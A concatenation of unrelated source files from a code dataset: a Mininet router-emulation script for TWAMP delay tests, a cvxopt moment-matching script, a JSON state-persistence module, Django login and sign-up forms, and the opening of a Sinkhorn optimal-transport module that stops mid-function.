        # dirs = [PRIVDIR]
        OVSBridge.__init__(self, name, *args, **kwargs)
        self.dir = "/tmp/%s" % name
        self.nets = []
        if not os.path.exists(self.dir):
            os.makedirs(self.dir)

    def config(self, **kwargs):
        # pylint: disable=arguments-differ
        # Init steps
        OVSBridge.config(self, **kwargs)
        # Iterate over the interfaces
        for intf in self.intfs.values():
            # Remove any configured address
            self.cmd('ifconfig %s 0' % intf.name)
        # # For the first one, let's configure the mgmt address
        # if first:
        #     first = False
        #     self.cmd('ip a a %s dev %s' %(kwargs['mgmtip'], intf.name))
        # let's write the hostname in /var/mininet/hostname
        self.cmd("echo '" + self.name + "' > " + PRIVDIR + "/hostname")
        # Run the per-node boot script, if one was provided
        if os.path.isfile(BASEDIR + self.name + "/start.sh"):
            self.cmd('source %s' % BASEDIR + self.name + "/start.sh")

    def cleanup(self):
        # def remove_if_exists(filename):
        #     if os.path.exists(filename):
        #         os.remove(filename)
        OVSBridge.cleanup(self)
        # Rm dir
        if os.path.exists(self.dir):
            shutil.rmtree(self.dir)
# the add_link function creates a link and assigns the interface names
# as node1-node2 and node2-node1
def add_link(my_net, node1, node2):
    """Link two nodes, naming each interface '<local>-<peer>'."""
    name1 = '%s-%s' % (node1.name, node2.name)
    name2 = '%s-%s' % (node2.name, node1.name)
    my_net.addLink(node1, node2, intfName1=name1, intfName2=name2)
def create_topo(my_net):
    # pylint: disable=invalid-name, too-many-locals, too-many-statements
    """Populate *my_net* with the 8-router topology, its hosts/datacenters
    and the out-of-band management network."""
    # Hosts and datacenter nodes first, then the controller and the routers
    # (the creation order of the original hand-written version is preserved).
    host_names = [
        'h11', 'h12', 'h13', 'h31', 'h32', 'h33',
        'h51', 'h52', 'h53', 'h81', 'h82', 'h83',
        'hdc1', 'hdc2', 'hdc3',
    ]
    nodes = {name: my_net.addHost(name=name, cls=BaseNode)
             for name in host_names}
    # The controller lives in the root namespace and runs no sshd
    nodes['controller'] = my_net.addHost(name='controller', cls=BaseNode,
                                         sshd=False, inNamespace=False)
    router_names = ('r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7', 'r8')
    for router_name in router_names:
        nodes[router_name] = my_net.addHost(name=router_name, cls=Router)

    # Wiring.  add_link names both interfaces explicitly
    # (<node1>-<node2> / <node2>-<node1>), so interface naming does not
    # depend on creation order.
    links = [
        # hosts of r1
        ('h11', 'r1'), ('h12', 'r1'), ('h13', 'r1'),
        # r1 - r2
        ('r1', 'r2'),
        # datacenters of r2
        ('hdc1', 'r2'),
        # r2 - r3 and r2 - r7
        ('r2', 'r3'), ('r2', 'r7'),
        # hosts of r3
        ('h31', 'r3'), ('h32', 'r3'), ('h33', 'r3'),
        # r3 - r4, r4 - r5, r4 - r6
        ('r3', 'r4'), ('r4', 'r5'), ('r4', 'r6'),
        # hosts and datacenter of r5
        ('h51', 'r5'), ('h52', 'r5'), ('h53', 'r5'), ('hdc3', 'r5'),
        # r5 - r6, r6 - r7, r6 - r8, r7 - r8
        ('r5', 'r6'), ('r6', 'r7'), ('r6', 'r8'), ('r7', 'r8'),
        # hosts and datacenter of r8
        ('h81', 'r8'), ('h82', 'r8'), ('h83', 'r8'), ('hdc2', 'r8'),
    ]
    for left, right in links:
        add_link(my_net, nodes[left], nodes[right])

    # Create the mgmt switch and attach the controller and every router to it
    sw = my_net.addSwitch(name='sw', cls=Switch, dpid='1')
    add_link(my_net, nodes['controller'], sw)
    for router_name in router_names:
        add_link(my_net, nodes[router_name], sw)
def add_nodes_to_etc_hosts():
    """Merge the host-to-IP mappings from ETC_HOSTS_FILE into /etc/hosts."""
    hosts_db = python_hosts.hosts.Hosts()
    # import_file() returns a summary dict; keep only the add counters
    result = hosts_db.import_file(ETC_HOSTS_FILE)['add_result']
    total = result['ipv6_count'] + result['ipv4_count']
    print('*** Added %s entries to /etc/hosts\n' % total)
def remove_nodes_from_etc_hosts(net):
    """Remove every Mininet node, and its '.m' management alias, from /etc/hosts."""
    print('*** Removing entries from /etc/hosts\n')
    hosts_db = python_hosts.hosts.Hosts()
    # First pass: drop the plain hostname entries
    for node in net.hosts:
        hosts_db.remove_all_matching(name=str(node))
    # Second pass: management-network aliases ('<host>.m') are stored as
    # separate entries, so they survive the first pass and need their own
    for node in net.hosts:
        hosts_db.remove_all_matching(name='%s.m' % node)
    # Persist the changes back to /etc/hosts
    hosts_db.write()
def stop_all():
    """Tear down the emulation: clean Mininet state and kill routing daemons."""
    # Clean Mininet emulation environment
    os.system('sudo mn -c')
    # Kill all the started daemons
    os.system('sudo killall zebra isisd')
def extract_host_pid(dumpline):
    """Parse the PID out of a Mininet node repr such as '<Host r1: ... pid=42> '.

    The repr ends with '> ', hence the two trailing characters are stripped
    before the integer conversion.
    """
    pid_str = dumpline[dumpline.find('pid=') + 4:]
    return int(pid_str[:-2])
def simple_test():
    """Build the topology, start the emulation and hand control to the CLI.

    Reads the module globals `choosed_sender` / `choosed_reflector`
    (populated by __main) to select the TWAMP sender and reflector routers.
    Writes a "<host> <pid>" table to OUTPUT_PID_TABLE_FILE, optionally adds
    the nodes to /etc/hosts, and tears everything down when the CLI exits.
    """
    global choosed_sender, choosed_reflector
    "Create and test a simple network"
    # topo = RoutersTopo()
    # net = Mininet(topo=topo, build=False, controller=None)
    net = Mininet(topo=None, build=False, controller=None)
    create_topo(net)
    net.build()
    net.start()
    print("Dumping host connections")
    dumpNodeConnections(net.hosts)
    # print "Testing network connectivity"
    # net.pingAll()
    # Persist host -> pid mapping so external tools can enter the namespaces
    with open(OUTPUT_PID_TABLE_FILE, "w") as file:
        for host in net.hosts:
            file.write("%s %d\n" % (host, extract_host_pid(repr(host))))
    # Add Mininet nodes to /etc/hosts
    if ADD_ETC_HOSTS:
        add_nodes_to_etc_hosts()
    # Castagnacci-Ditella project
    # Step 1. Retrieve the sender & reflector routers chosen by the user
    sender = net.get(choosed_sender)
    reflector = net.get(choosed_reflector)
    # waiting sender to setup (after several test, we noticed that removing the sleep
    # will cause this command to fail)
    print("Waiting the routers to set up... (40 sec)")
    #sleep(20)
    # Step 2. Execute on reflector, twampy cmd
    print("REFLECTOR", reflector.name, "Is sniffing")
    #reflector.cmd("./reflector &")
    #sleep(2)
    print("SENDER", sender.name, "Is sending (scapy crafted) TWAMP packets")
    # Step 4. Execute on sender twampy cmd
    #sender.cmd("./sender > sender_results.txt &")
    # -----------------------------
    # Interactive Mininet shell; blocks until the user exits
    CLI(net)
    # Remove Mininet nodes from /etc/hosts
    if ADD_ETC_HOSTS:
        remove_nodes_from_etc_hosts(net)
    net.stop()
    stop_all()
def parse_arguments():
    """Parse and return the command-line options of the emulation script.

    Returns:
        argparse.Namespace with the booleans `start_node_managers`
        (default False) and `add_etc_hosts` (default True, cleared by
        --no-etc-hosts).
    """
    cli = ArgumentParser(
        description='Emulation of a Mininet topology (8 routers running '
                    'IS-IS, 1 controller out-of-band'
    )
    cli.add_argument(
        '--start-node-managers', dest='start_node_managers',
        action='store_true', default=False,
        help='Define whether to start node manager on routers or not'
    )
    cli.add_argument(
        '--no-etc-hosts', dest='add_etc_hosts',
        action='store_false', default=True,
        help='Define whether to add Mininet nodes to /etc/hosts file or not'
    )
    # Evaluate sys.argv against the declared options
    return cli.parse_args()
def __main():
    """Interactive entry point: pick TWAMP endpoints, parse flags, run the test."""
    global ADD_ETC_HOSTS  # pylint: disable=global-statement
    global START_NODE_MANAGERS  # pylint: disable=global-statement
    global NODE_MANAGER_GRPC_PORT  # pylint: disable=global-statement
    global net
    global choosed_sender, choosed_reflector
    # Castagnacci-Ditella project
    # Loop until the user names a valid sender AND a valid reflector router
    possible_routers = ["r1", "r2", "r3", "r4", "r5", "r6", "r7", "r8"]
    sender_choosed = False
    reflector_chosed = False
    while not sender_choosed or not reflector_chosed:
        print("Here are the routers in the current mininet topology:")
        print("r1\nr2\nr3\nr4\nr5\nr6\nr7\nr8")
        print("Please choose a Sender and Receiver to be used for Delay Measurement (TWAMP)")
        if not sender_choosed:
            choosed_sender = input("Choose the Router 'Sender': ")
            if choosed_sender in possible_routers:
                sender_choosed = True
        if not reflector_chosed:
            choosed_reflector = input("Choose the Router 'Reflector': ")
            if choosed_reflector in possible_routers:
                reflector_chosed = True
        os.system("clear")
        if not sender_choosed:
            print("!! Wrong choice for sender !!")
        if not reflector_chosed:
            print("!! Wrong choice for reflector !!")
    # -----------------------------
    # Parse command-line arguments
    args = parse_arguments()
    # Define whether to start node manager on routers or not
    START_NODE_MANAGERS = args.start_node_managers
    if START_NODE_MANAGERS:
        # Both env-derived settings must be present and valid before starting
        if NODE_MANAGER_PATH is None:
            print('Error: --start-node-managers requires NODE_MANAGER_PATH '
                'variable')
            print('NODE_MANAGER_PATH variable not set in .env file\n')
            sys.exit(-2)
        if not os.path.exists(NODE_MANAGER_PATH):
            print('Error: --start-node-managers requires NODE_MANAGER_PATH '
                'variable')
            print('NODE_MANAGER_PATH defined in .env file '
                'points to a non existing folder\n')
            sys.exit(-2)
        if NODE_MANAGER_GRPC_PORT is None:
            print('Error: --start-node-managers requires '
                'NODE_MANAGER_GRPC_PORT variable')
            print('NODE_MANAGER_GRPC_PORT variable not set in .env file\n')
            sys.exit(-2)
    # Define whether to add Mininet nodes to /etc/hosts file or not
    ADD_ETC_HOSTS = args.add_etc_hosts
    # Tell mininet to print useful information
    setLogLevel('info')
    simple_test()
# Run the emulation only when executed as a script (not on import)
if __name__ == '__main__':
    __main()
| [
"carmine.scarpitta@uniroma2.it"
] | carmine.scarpitta@uniroma2.it |
8dde1cb41318b2e39719aa73d12da6ee67a46207 | 9bc8b5b2db293fce019b024312cb5406e06ea8f0 | /optimize.py | 3abfc2426c70371ee6f50cf249cbe04de0962d41 | [] | no_license | lbl9988/convexOptimization | 5246b1e66a6fc26527f0f3bb8daea58b0e566792 | cdfbe347dfd778db7713b6ace712ed837a4aba1e | refs/heads/master | 2021-05-27T06:18:00.584886 | 2014-04-28T19:11:20 | 2014-04-28T19:11:20 | 18,122,039 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,606 | py | #!/usr/bin/env python2
import sys
import math
import numpy as np
import pickle
import matplotlib.pyplot as plt
import itertools
import pylab
import glob
from pylab import plot, show
from numpy import vstack, array, arange
from scipy.cluster.vq import kmeans, vq
from collections import Counter
from cvxopt import matrix, solvers
from cvxopt import spmatrix, sparse
def get_point_dist(p0, p1):
    """Return the Euclidean distance between 2-D points p0 and p1 (x, y pairs)."""
    dx, dy = p0[0] - p1[0], p0[1] - p1[1]
    return math.sqrt(dx ** 2 + dy ** 2)
def get_dist(coords1, coords2):
    """Mean Euclidean distance between corresponding rows of two point sets.

    Both arguments are (n, 2) arrays (or nested lists) of x/y coordinates;
    only the first two columns are used, matching the original behavior.

    Vectorized replacement for the original per-row Python loop.
    """
    diff = np.asarray(coords1) - np.asarray(coords2)
    # Per-point Euclidean norm over the (x, y) columns, averaged over n
    per_point = np.sqrt(diff[:, 0] ** 2 + diff[:, 1] ** 2)
    return float(np.mean(per_point))
def compute_moments(dists):
    """Return [mean, variance, skewness, kurtosis] of a 1-D sample.

    Skewness and kurtosis are the standardized third and fourth central
    moments (kurtosis is NOT excess kurtosis, so it is 3.0 for a normal
    sample). Raises a division warning/produces inf if the variance is 0,
    exactly like the original implementation.

    Vectorized replacement for the original Python loops; the unused m5/m6
    accumulators of the original were dropped.
    """
    dists = np.asarray(dists, dtype=float)
    n = len(dists)
    mean = float(np.sum(dists)) / n
    # Center twice: the residual mean m1 of the centered sample can be
    # slightly non-zero in floating point, and the original subtracts it
    centered = dists - mean
    m1 = float(np.sum(centered)) / n
    centered = centered - m1
    m2 = float(np.sum(centered ** 2)) / n
    m3 = (float(np.sum(centered ** 3)) / n) / (math.sqrt(m2)) ** 3
    m4 = (float(np.sum(centered ** 4)) / n) / (m2 ** 2)
    return [mean, m2, m3, m4]
def read_coords(filename):
    """Read whitespace-separated float rows from `filename`.

    Returns a list of lists, one inner list of floats per input line.
    """
    with open(filename) as coordfile:
        return [[float(token) for token in line.split()] for line in coordfile]
def get_com(coords):
    """Return the centre of mass [x, y] of a sequence of 2-D points."""
    n = int(len(coords))
    x_sum, y_sum = 0.0, 0.0
    for point in coords:
        x_sum += point[0]
        y_sum += point[1]
    # Divide once at the end, as the original does
    return [x_sum / n, y_sum / n]
def get_framenum(num):
    """Return `num` formatted as a zero-padded, 6-digit frame-number string.

    Replaces the original if/elif cascade, which produced an inconsistent
    7-character result for num >= 100000 ('0' prepended to a 6-digit
    number); zfill keeps every value in [0, 999999] at exactly 6 digits.
    """
    return str(num).zfill(6)
def compute_quadratic_programming(Q, p, G, h, A, t):
    """Solve min 1/2 x'Qx + p'x  s.t.  Gx <= h and Ax = t with cvxopt.

    Returns the optimal point `x` from the cvxopt solution dictionary.
    """
    solution = solvers.qp(Q, p, G, h, A, t)
    return solution['x']
def construct_matrices(orig, offset, M1, M2, M3, M4):
    """Build the cvxopt QP data (Q, p, G, h, A, t) for moment matching.

    The decision vector stacks four candidate coordinate vectors
    x = [x1; x2; x3; x4] (length 4n). The objective ||x - targets||^2 is
    separable (Q = 2I, p = -2 * target powers) and each n-block is tied to
    one raw moment through a linear equality constraint; G/h encode x >= 0.

    M1..M4 are the target mean, variance, skewness and kurtosis; t converts
    them into raw (uncentered) moment sums.

    Note: `offset` is kept for interface compatibility but is unused. The
    original code computed offset-shifted powers on broken line
    continuations (dangling no-op expression statements) whose results were
    never consumed; that dead code has been removed without changing the
    returned matrices.
    """
    n = len(orig)
    dim = 4 * n
    orig_square = np.square(orig)
    orig_cube = np.power(orig, 3)
    orig_fourth = np.power(orig, 4)
    # Objective: 1/2 x' (2I) x - 2 * target' x  ==  ||x - target||^2 + const
    Q = 2 * spmatrix(1.0, range(dim), range(dim))
    p1 = matrix(-2.0 * orig)
    p2 = matrix(-2.0 * orig_square)
    p3 = matrix(-2.0 * orig_cube)
    p4 = matrix(-2.0 * orig_fourth)
    p = matrix([p1, p2, p3, p4])
    # Inequality x >= 0, written as -x <= 0
    G = spmatrix(-1.0, range(dim), range(dim))
    h = matrix(0.0, (dim, 1))
    ones = matrix(1.0, (1, n))
    zeros = matrix(0.0, (1, n))
    # One equality row per block: sum of the block equals the raw moment
    A1 = matrix([ones, zeros, zeros, zeros])
    A2 = matrix([zeros, ones, zeros, zeros])
    A3 = matrix([zeros, zeros, ones, zeros])
    A4 = matrix([zeros, zeros, zeros, ones])
    A = matrix([[A1], [A2], [A3], [A4]])
    # Central moments -> raw moment sums (binomial expansion about the mean)
    t1 = n * M1
    t2 = n * M2 + n * M1 * M1
    t3 = n * pow(M2, 1.5) * M3 + 3 * n * M1 * M2 + n * M1 * M1 * M1
    t4 = n * M2 * M2 * M4 + 4 * n * M1 * pow(M2, 1.5) * M3 + 6 * n * M1 * M1 * M2 + n * pow(M1, 4)
    t = matrix([t1, t2, t3, t4])
    return [Q, p, G, h, A, t]
def solve_newcoords(coordinates, target_moments):
    """Find new (x, y) coordinates matching the target per-axis moments.

    Solves one QP per axis (see construct_matrices): the solution vector
    stacks four candidate blocks holding the matched 1st..4th power values,
    which are mapped back to coordinates by the inverse power (sqrt, cube
    root, fourth root). The candidate set closest (mean Euclidean distance)
    to the original configuration is returned as an (n, 2) array.
    """
    # only considering the x coordinates
    # let target_xi = xi + di, di is unknown (i=1,2,..,500, 500 points)
    # the four target moments are known, tMxi (i=1,2,3,4)
    # number of equations 4, number of unknowns, di, is 500
    # this is an underdetermined polynomial system
    # assume a and b are the original x and y coordinates of the points
    n = len(coordinates)
    a = coordinates[:, 0]
    b = coordinates[:, 1]
    offset = 10.0
    [Mx1, Mx2, Mx3, Mx4, My1, My2, My3, My4] = target_moments
    # Solve the x-axis QP, then the y-axis QP
    [Q, p, G, h, A, t] = construct_matrices(a, offset, Mx1, Mx2, Mx3, Mx4)
    sol_X = compute_quadratic_programming(Q, p, G, h, A, t)
    print "new x locations:\n", sol_X
    [Q, p, G, h, A, t] = construct_matrices(b, offset, My1, My2, My3, My4)
    sol_Y = compute_quadratic_programming(Q, p, G, h, A, t)
    #print "new y locations:\n", sol_Y
    # Split each 4n-long cvxopt solution into its four n-long blocks
    X1 = list(itertools.chain(*array(sol_X[0:n])))
    X2 = list(itertools.chain(*array(sol_X[n:2*n])))
    X3 = list(itertools.chain(*array(sol_X[2*n:3*n])))
    X4 = list(itertools.chain(*array(sol_X[3*n:])))
    Y1 = list(itertools.chain(*array(sol_Y[0:n])))
    Y2 = list(itertools.chain(*array(sol_Y[n:2*n])))
    Y3 = list(itertools.chain(*array(sol_Y[2*n:3*n])))
    Y4 = list(itertools.chain(*array(sol_Y[3*n:])))
    # Blocks 2..4 hold matched powers; invert them back to coordinates
    onethird = 1.0/3.0
    X2 = np.sqrt(X2)
    Y2 = np.sqrt(Y2)
    X3 = np.power(X3, onethird)
    Y3 = np.power(Y3, onethird)
    X4 = np.sqrt(np.sqrt(X4))
    Y4 = np.sqrt(np.sqrt(Y4))
    coords1 = np.column_stack((X1, Y1))
    coords2 = np.column_stack((X2, Y2))
    coords3 = np.column_stack((X3, Y3))
    coords4 = np.column_stack((X4, Y4))
    # Pick the candidate closest to the original configuration
    dist1 = get_dist(coordinates, coords1)
    dist2 = get_dist(coordinates, coords2)
    dist3 = get_dist(coordinates, coords3)
    dist4 = get_dist(coordinates, coords4)
    print dist1, dist2, dist3, dist4
    newcoords = coords1
    dist = dist1
    if dist > dist2:
        newcoords = coords2
        dist = dist2
    if dist > dist3:
        newcoords = coords3
        dist = dist3
    if dist > dist4:
        newcoords = coords4
        dist = dist4
    print get_dist(coordinates, newcoords)
    return newcoords
def my_circle_scatter(axes, x_array, y_array, radius=0.5, **kwargs):
    """Add one pylab Circle patch per (x, y) pair to `axes`; always returns True.

    Extra keyword arguments (color, alpha, ...) are forwarded to Circle.
    """
    for cx, cy in zip(x_array, y_array):
        axes.add_patch(pylab.Circle((cx, cy), radius=radius, **kwargs))
    return True
def drawcoords(coords, newcoords, imgname):
    """Render the original (green) and optimized (red) point sets to `imgname`."""
    fig = plt.figure()
    axes = fig.add_subplot(111, aspect='equal')
    # Original configuration in green
    my_circle_scatter(axes, zip(*coords)[0], zip(*coords)[1],
                      radius=4.9, alpha=0.7, color='g')
    # New configuration in red, semi-transparent so overlaps stay visible
    my_circle_scatter(axes, zip(*newcoords)[0], zip(*newcoords)[1],
                      radius=4.9, alpha=0.5, color='r')
    axes.set_xlim((0, 1000))
    axes.set_ylim((0, 1000))
    plt.savefig(imgname)
if __name__ == '__main__':
    # Frame identifier of the processed snapshot (formatted but not used below)
    step = 3500
    framenum = get_framenum(step)
    # Target distribution: its per-axis moments become the QP constraints
    targetfilename = sys.argv[1]
    targetCoordinates = np.array(read_coords(targetfilename))
    targetX = targetCoordinates[:, 0]
    targetY = targetCoordinates[:, 1]
    [Mx1, Mx2, Mx3, Mx4] = compute_moments(targetX)
    [My1, My2, My3, My4] = compute_moments(targetY)
    target_moments = [Mx1, Mx2, Mx3, Mx4, My1, My2, My3, My4]
    # distribution to change: calculate deltax and deltay for each point
    filename = sys.argv[2]
    coordinates = np.array(read_coords(filename))
    newcoords = solve_newcoords(coordinates, target_moments)
    # Persist the matched coordinates and report achieved vs target moments
    np.savetxt("newcoords.txt", newcoords)
    print "===== target ===== "
    print target_moments
    print "===== sol ===== "
    print compute_moments(newcoords[:, 0]) + compute_moments(newcoords[:, 1])
    drawcoords(coordinates, newcoords, "out.png")
| [
"linge.bai@gmail.com"
] | linge.bai@gmail.com |
4152272941dbe857b515676f5a4c8f164df20aee | b3d0f568f6e73dcaa6fe45e3e625f416ce60743e | /mapcreator/persistence.py | 333b0d8c4b6c8381e34007038859365eaa7a67db | [
"CC-BY-4.0",
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | 3Dmaps/mapcreator | fecf07a86f12ebb467db82a430ff9bae1ebbd58a | f5d0a321905af6bf0c336d0a3e416bf580c8893a | refs/heads/master | 2021-04-28T10:17:28.232729 | 2018-05-02T09:54:52 | 2018-05-02T09:54:52 | 122,063,184 | 1 | 1 | MIT | 2018-05-02T07:39:29 | 2018-02-19T13:02:26 | Python | UTF-8 | Python | false | false | 778 | py | import json
import shutil
from os import path, makedirs
from mapcreator.state import State
STATE_DIR = '.mapcreator'
STATE_FILE = 'state.json'
def init_state():
    """Create a fresh State, persist it to disk, and return it."""
    state = State()
    save_state(state)
    return state
def state_path():
    """Return the path of the persisted state file, e.g. '.mapcreator/state.json'."""
    return path.join(STATE_DIR, STATE_FILE)
def state_exists():
    """Return True if a state file has already been persisted to disk."""
    return path.exists(state_path())
def load_state():
    """Load the persisted State, initialising (and saving) a new one if absent."""
    if not state_exists():
        return init_state()
    with open(state_path(), 'r') as infile:
        return State.from_dict(json.load(infile))
def save_state(state):
    """Serialise `state` as JSON into the state file, creating the directory.

    Args:
        state: an object exposing a `to_dict()` method (a State instance).

    Uses makedirs(..., exist_ok=True) instead of the original
    exists-then-create sequence, removing the race between the check and
    the creation (e.g. two processes saving concurrently).
    """
    makedirs(STATE_DIR, exist_ok=True)
    with open(state_path(), 'w') as outfile:
        json.dump(state.to_dict(), outfile)
def clear_state():
    """Delete the whole state directory and its contents.

    Raises FileNotFoundError if the directory does not exist.
    """
    shutil.rmtree(STATE_DIR)
| [
"julius.laitala@relex.fi"
] | julius.laitala@relex.fi |
a6acc0487ea9ab45a61c37a1a14d4f41c46a950f | 7202a05f16571ca9a485f07a3bee610f531879a2 | /personas/forms.py | 9b5d4acb0967d2fec4ffbe9d9d72801465dd0b13 | [] | no_license | yrey420/DjangoMangaka | 59a4ac665838383c8ea30af9f2b6ceef310c3fee | 529a4d0e8e0b42e8ed5d54adbc49eeb18aad5ef8 | refs/heads/master | 2023-01-29T04:37:40.195188 | 2020-12-07T20:50:30 | 2020-12-07T20:50:30 | 318,555,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | from django import forms
from django.contrib.auth.forms import UserCreationForm
from personas.models import LocalUser
class LoginForm(forms.Form):
    """Plain (non-model) form carrying the two credential fields for login.

    Both widgets get Bootstrap's "form-control" class and a placeholder,
    so the template can render them without extra markup.
    """

    username = forms.CharField(
        widget=forms.TextInput(
            attrs={
                "placeholder": "Enter your Username",
                "class": "form-control"
            }
        ))
    password = forms.CharField(
        widget=forms.PasswordInput(
            attrs={
                "placeholder": "Enter your password",
                "class": "form-control"
            }
        ))
class SignUpForm(UserCreationForm):
    """Registration form for LocalUser, built on Django's UserCreationForm.

    Redeclares the inherited fields only to attach Bootstrap styling and
    placeholders; password validation/matching is handled by the parent.
    """

    username = forms.CharField(
        widget=forms.TextInput(
            attrs={
                "placeholder": "Enter your new username",
                "class": "form-control"
            }
        ))
    email = forms.EmailField(
        widget=forms.EmailInput(
            attrs={
                "placeholder": "Enter your e-Mail",
                "class": "form-control"
            }
        ))
    password1 = forms.CharField(
        widget=forms.PasswordInput(
            attrs={
                "placeholder": "Enter your new password",
                "class": "form-control"
            }
        ))
    password2 = forms.CharField(
        widget=forms.PasswordInput(
            attrs={
                "placeholder": "Let's double check your password",
                "class": "form-control"
            }
        ))

    class Meta:
        # Bind the form to the project's custom user model
        model = LocalUser
        fields = ('username', 'email', 'password1', 'password2')
| [
"yrey415@unab.edu.co"
] | yrey415@unab.edu.co |
e5c5c568489326a5ff8d9196eaf8e9c0da078b97 | 2801ac4b53af45ed051b8eb19b7643f4f81a2132 | /LinSinkhorn.py | 62b9503e5c5a84194c53f0df9a9378ba9f7686d7 | [] | no_license | cxxszz/LOT | eb3a9f06ee0402aff999e45c035f388b9660337a | 2cdd7136e8e7320848c692fa72001b92a8346a7f | refs/heads/main | 2023-08-03T17:22:08.515693 | 2021-09-25T08:32:40 | 2021-09-25T08:32:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,928 | py | import numpy as np
import time
from sklearn.cluster import KMeans
import scipy
from scipy import special
# Here C = C1 * C2 and P = P1 * P2
# Useful for kernel-based methods
def compute_OT(P1, P2, C1, C2):
    """Return <C, P> = trace(P1^T C1 C2 P2^T) for factored cost and plan.

    Here C = C1 @ C2 and P = P1 @ P2 (kernel-based low-rank methods).
    Uses the identity trace(A @ B) == sum(A * B.T), so the r x r product
    of the original (an O(r^2 d) matmul plus trace) is never formed; this
    costs only O(r d) after the two factor products.
    """
    left = np.dot(P1.T, C1)    # (r, d)
    right = np.dot(C2, P2.T)   # (d, r)
    return np.sum(left * right.T)
def KL(A, B):
    """Kullback-Leibler divergence sum(A * log(A / B)), without normalisation.

    A and B are positive arrays of the same shape; zeros in either produce
    -inf/nan from the logs, as in the original.
    """
    log_ratio = np.log(A) - np.log(B)
    return np.sum(A * log_ratio)
def Sinkhorn(C, reg, a, b, max_iter=1000, delta=1e-3, lam=0, time_out=200):
    """Classical Sinkhorn iterations for entropically regularised OT.

    Returns (final cost, cost history, elapsed-time history, coupling P),
    or the string "Error" if the objective becomes NaN. `lam` is a small
    additive regulariser guarding the divisions; `time_out` (seconds) caps
    the wall-clock time.
    """
    t_start = time.time()
    cost_hist, time_hist = [], []
    # Gibbs kernel K = exp(-C / reg), computed in place
    K = np.empty(C.shape, dtype=C.dtype)
    np.divide(C, -reg, out=K)
    np.exp(K, out=K)
    v = np.ones(np.shape(b)[0])
    Kv = np.dot(K, v) + lam
    err = 1
    for _ in range(max_iter):
        if err <= delta:
            # Converged: marginal violation below tolerance
            return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P
        # Alternate scaling updates of u and v
        u = a / Kv
        Ktu = np.dot(K.T, u) + lam
        v = b / Ktu
        P = u.reshape((-1, 1)) * K * v.reshape((1, -1))
        Kv = np.dot(K, v) + lam
        err = np.sum(np.abs(u * Kv - a))
        cost = np.sum(P * C)
        if np.isnan(cost):
            print("Error: NaN OT value")
            return "Error"
        cost_hist.append(cost)
        elapsed = time.time() - t_start
        time_hist.append(elapsed)
        if elapsed > time_out:
            return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P
    return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P
def Sinkhorn_LSE(C, reg, a, b, max_iter=1000, delta=1e-3, lam=0, time_out=200):
    """Sinkhorn in the log domain (log-sum-exp updates) for numerical stability.

    Same contract as Sinkhorn(): returns (final cost, cost history, elapsed
    times, coupling P), or "Error" on a NaN objective. `lam` is accepted for
    interface parity but unused (there are no divisions to regularise here).
    """
    t_start = time.time()
    cost_hist, time_hist = [], []
    f = np.zeros(np.shape(a)[0])
    g = np.zeros(np.shape(b)[0])
    err = 1
    for _ in range(max_iter):
        if err <= delta:
            # Converged: row-marginal violation below tolerance
            return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P
        # Dual update of f (rows), then of g (columns)
        M = (f[:, None] + g[None, :] - C) / reg
        f = reg * np.log(a) + f - reg * scipy.special.logsumexp(M, axis=1)
        M = (f[:, None] + g[None, :] - C) / reg
        g = reg * np.log(b) + g - reg * scipy.special.logsumexp(M, axis=0)
        # Primal coupling induced by the current potentials
        M = (f[:, None] + g[None, :] - C) / reg
        P = np.exp(M)
        err = np.sum(np.abs(np.sum(P, axis=1) - a))
        cost = np.sum(P * C)
        if np.isnan(cost):
            print("Error: NaN OT value")
            return "Error"
        cost_hist.append(cost)
        elapsed = time.time() - t_start
        time_hist.append(elapsed)
        if elapsed > time_out:
            return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P
    return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P
# Linear RF Sinkhorn: C = C1 * C2
def Lin_RF_Sinkhorn(C1, C2, reg, a, b, rank, seed=49, max_iter=1000, delta=1e-3, lam=0):
    """Sinkhorn with a random-feature low-rank kernel approximation.

    The cost is factored as C = C1 @ C2 and the Gibbs kernel is
    approximated by A @ B (RF_Approx). Returns (cost, cost history,
    elapsed times, P1, P2) with the coupling factored as P1 @ P2, or
    "Error" if the objective becomes NaN.
    """
    t_start = time.time()
    cost_hist, time_hist = [], []
    A, B = RF_Approx(-C1, C2, reg, num_samples=rank, seed=seed)
    v = np.ones(np.shape(b)[0])
    Kv = np.dot(A, np.dot(B, v)) + lam
    err = 1
    for _ in range(max_iter):
        if err <= delta:
            return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P1, P2
        # Scaling updates through the low-rank factors (never form A @ B)
        u = a / Kv
        Ktu = np.dot(B.T, np.dot(A.T, u)) + lam
        v = b / Ktu
        P1 = u.reshape((-1, 1)) * A
        P2 = B * v.reshape((1, -1))
        Kv = np.dot(A, np.dot(B, v)) + lam
        err = np.sum(np.abs(u * Kv - a))
        cost = compute_OT(P1, P2, C1, C2)
        if np.isnan(cost):
            print("Error: NaN OT value")
            return "Error"
        cost_hist.append(cost)
        time_hist.append(time.time() - t_start)
    return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P1, P2
# Linear Nys Sinkhorn: C = C1 * C2
def Lin_Nys_Sinkhorn(
    C1, C2, reg, a, b, rank, seed=49, max_iter=1000, delta=1e-3, lam=0
):
    """Sinkhorn with a Nystrom low-rank approximation of the Gibbs kernel.

    The cost is factored as C = C1 @ C2. Returns (cost, cost history,
    elapsed times, P1, P2) with the coupling factored as P1 @ P2, or
    "Error" if the objective becomes NaN.
    """
    t_start = time.time()
    cost_hist, time_hist = [], []
    # Nystrom factors: kernel ~= A @ B with A (n, rank) and B (rank, m)
    V1, V2 = Nys_approx(-C1, C2.T, reg, rank, seed=seed, stable=1e-10)
    A = np.dot(V2, np.linalg.inv(V1))[: len(a), :]
    B = V2.T[:, len(a):]
    v = np.ones(np.shape(b)[0])
    Kv = np.dot(A, np.dot(B, v)) + lam
    err = 1
    for _ in range(max_iter):
        if err <= delta:
            return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P1, P2
        # Scaling updates through the low-rank factors
        u = a / Kv
